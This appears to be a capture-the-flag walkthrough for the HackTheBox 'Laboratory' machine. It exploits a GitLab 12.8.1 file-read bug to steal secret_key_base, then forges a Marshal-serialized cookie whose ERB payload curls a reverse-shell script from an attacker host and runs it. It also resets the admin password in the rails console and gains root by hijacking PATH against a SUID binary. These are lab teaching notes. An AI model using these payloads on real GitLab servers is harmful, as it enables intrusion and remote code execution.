lets start hacking hackthebox laboratory …..!
I’m using nmap scanning…
there are 80,443 is open and its also giving two dns names . so lets add this in our /etc/hosts file
i don’t find anything in https://laboratory.htb/ so i just moved to https://git.laboratory.htb/ here i got a new git-lab sign in page
so i have registered as new user . its only allow laboratory.htb domain emails for register …!
i have sign in as new user hacker .. so i have checked which version of git they are using ..
I have checked is there any existing vulnerability in this version i have googled
i have found some exploit and a hackerone report for this version git-lab
so i have checked that report. its Arbitrary file read vulnerability ( https://hackerone.com/reports/827052 )
there is an python script for exploit for recreate this vulnerability https://github.com/anjai94/gitlab-file-read-exploit
i have edited the config part as we need
the exploit give me the secrets.yml file. in privies hacker one report he also telling how to get a shell using this ..!
so i have installed git-lab 12.8.1 in my kali machine ( https://packages.gitlab.com/app/gitlab/gitlab-ce/search?q=12.8.1&filter=all&dist= )
i have installed gitlab using dpkgthen i have changed thesecret_key_base of over kali machine (/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml) to the secret_key_base we got from the secret.yml file in site .
i have replaced the keys and started gitlab-rails console
it will take few min to start then i have created a bash script to upload..
i have started a python simple server on my machine …
this payload can be generated by changing your own gitlab instances secret_key_base to match, then running the following in a rails console
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env[“action_dispatch.cookies_serializer”] = :marshal
cookies = request.cookie_jar
erb = ERB.new(“<%= `curl http://10.0.0.1:8000/rev.sh -o /tmp/rev.sh` %>”)
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, “@result”, ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
after pasting this payload we have to trigger this payload for that we are using another console
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env[“action_dispatch.cookies_serializer”] = :marshal
cookies = request.cookie_jar
erb = ERB.new(“<%= `bash /tmp/rev.sh` %>”)
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, “@result”, ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
this will give us cookie we can use use this for that for rigger a shell
curl -vvv ‘https://git.laboratory.htb/users/sign_in' -b “experimentation_subject_id=” -k
add this that cookie with this command also start a nc to get reverse connection
now we can rest user password using gitlab-rails console
gitlab-rails console -e production
user = User.where(id: 1).first
user.password = ‘password’
user.password_confirmation = ‘password’
user.save!
now we can login gitlab using new password ..after login we will get a ssh key ..!
we can use this to crate ssh login
here we will get user flag …
privilege escalation
we can check here for suid permissions
find / -perm -u=s -type f 2>/dev/null
we can see that its hash given suid permission for docker-security
we can get root access by exploiting the PATH variable here
cd /tmp
echo “/bin/bash” > chmod
chmod 777 chmod
echo $PATH
export PATH=/tmp:$PATH
cd /usr/local/bin/
./docker-security
